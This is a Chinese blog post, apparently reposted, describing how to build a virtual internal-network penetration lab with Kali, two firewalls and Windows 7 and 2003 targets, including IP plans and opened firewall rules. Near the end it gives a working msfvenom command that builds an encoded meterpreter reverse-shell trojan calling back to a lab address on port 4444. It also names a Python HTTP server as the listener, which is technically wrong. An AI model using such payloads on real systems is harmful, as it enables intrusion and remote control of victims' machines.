我是靠谱客的博主 粗心麦片,最近开发中收集的这篇文章主要介绍内网渗透系列之真实内网环境搭建真实内网环境搭建前言靶机的准备后记,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

真实内网环境搭建

文章目录

  • 真实内网环境搭建
  • 前言
  • 靶机的准备
  • 后记

前言

最近学习了内网的一些知识,学会了域的创建,域渗透以及内网渗透方面的知识,这里就简单给大家介绍一下真实内网环境的搭建过程。

靶机的准备

这里需要5台机器,分别是kali+2台防火墙+2台服务器(内网机器)其中防火墙可以去网上下载。或者可以去我的资源那里下载。其中的话,就需要3张网卡了,VM1,VM2,VM8,其中VM1和VM2是仅主机模式,VM8是NAT模式。
靶机的网卡设置如下:
网卡设置:
kali(VM1)192.168.101.102

防火墙1
外网:192.168.231.131
内网:192.168.101.1

防火墙2
外网:192.168.231.132
内网:192.168.102.1

win7(VM2):
192.168.102.102

win03(VM2):
192.168.102.103

接下来,我们打开所有的靶机,进行配置环境
在网络编辑器里,进行编译网卡信息。
在这里插入图片描述
现在我创建好了VM2的虚拟机,其中的VM1和VM2不用勾选DHCP,让他自动获取ip
在这里插入图片描述
接下来,就是配置防火墙的一些配置信息了,让主机可以访问到防火墙的内网和外网的ip我们打开防火墙1,进行配置信息,这里由于在虚拟机中配置了防火墙,对网络起到一定的中断作用,所以主机一直上不了网,我只能用手机拍一些图片给大家配置一下。这里的防火墙2就直接克隆一份就行了。
在这里插入图片描述

在这里插入图片描述
这是防火墙打开时的初始化配置,我们需要配置le0,le1网卡,分别是内网和外网的网卡。我们还要配置ip地址。在这里插入图片描述
在这里插入图片描述
我们就相当于配置好了防火墙1的ip地址,接下来我们配置防火墙2的地址。
在这里插入图片描述
在这里插入图片描述
当我们的ip没有得到更新的时候,我们可以刷新一下网卡,在cmd上输入ipconfig /release,然后在输入ipconfig /renew。
在这里插入图片描述
在这里插入图片描述
我们访问防火墙的外网ip,修改一些规则信息,将WAN一些禁止网络流量通过的选项去取勾选,选为任意流量都可以通过。
在这里插入图片描述
在这里插入图片描述
将其中的TCP修改为any
在这里插入图片描述
保存,退出页面
在这里插入图片描述
一定要点击Apply changes才会生效
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我们添加外网的4444端口开放,使得win7可以访问kali的4444端口,也就是防火墙的外网ip:192.168.231.131:4444
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我们在win7进行访问kali的4444端口
192.168.231.131:4444
在这里插入图片描述
我们先用msf生成一个木马程序,将他放入win7中执行,命令如下:
木马的生成

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.131 lport=4444 -a x86 --platform windows -b “x00xff” -e x86 /shikata_ga_nai -f exe > msf.exe
(其中的-p是payload的木马,-a是平台架构,-b是避开字符,-e是字符编码)

我们打开kali的4444端口进行监听

python -m SimpleHTTPServer 4444

}
我们打开msf,进行反弹shell
在这里插入图片描述
这里的木马程序如何放入,就需要开始时外网渗透获取的getshell后,进行上传程序,然后在终端执行即可。

后记

好了,真实的内网环境就搭建好了,由于篇幅较长,就不介绍接下来的攻击流程了,下一篇文章,我们重点讲一下,Pivoting跳板攻击与自动路由的配置流程,用于访问内网的页面至关重要,大家好好复习一下吧。

最后

以上就是粗心麦片为你收集整理的内网渗透系列之真实内网环境搭建真实内网环境搭建前言靶机的准备后记的全部内容,希望文章能够帮你解决内网渗透系列之真实内网环境搭建真实内网环境搭建前言靶机的准备后记所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(77)

评论列表共有 0 条评论

立即
投稿
返回
顶部